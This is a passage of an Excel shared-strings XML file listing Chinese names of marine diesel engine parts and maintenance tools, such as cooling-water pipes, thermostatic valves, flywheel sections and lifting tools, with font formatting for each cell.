    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制空气管支撑</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器清洗支撑</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动空气进口</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动空气分配器滑油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压泵空气布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷气助推器小孔</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动空气分配器法兰</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水进口堵头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水进口管法兰</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水泄放管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压气排气管支撑</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器泄放管支撑</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泄放管支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>薄片</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滴水分离器底板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滴水分离器顶块</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>方法兰</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>方盲法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弯接头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>I</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>II</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>低温中间管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高温集管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>低温出口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水出口进入发动机的量</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水集管支管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器出口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器进口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水恒温阀安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水恒温阀布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>恒温阀外壳</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盲件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve"> PI10</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>用管子</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气空气</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油冷却器出口</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气空气</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油冷却器进口</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度计部件（毛坯）</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高温中间管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水进口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力衬套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧圈</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压管总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封油单元</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>迷你阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内六角固定螺钉</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢块</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油气分离器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气进口管安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管接头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>霍尔效应监测器安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气进气管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>火焰清除器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气集管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护格栅</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间轴承</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>交流发电机规格</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>对中程序</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通用液压工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柴油机提升工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柴油机提升吊环螺母</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底板提升总成</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮下部</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮上部</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力块</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>VOC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进口</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力块</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>VOC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>出口</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泄放阀测试块</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <t>VOC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>对角附件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>切断阀测试块</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <t>U</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>形环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀座拆卸</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器清洗工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标准备件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冲压机</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气压力滤器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>打磨机</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>维护工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>低拆卸高度工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>校准工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水平环座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>膨胀塞安装冲头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具箱总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀座表面修理机</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺纹套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
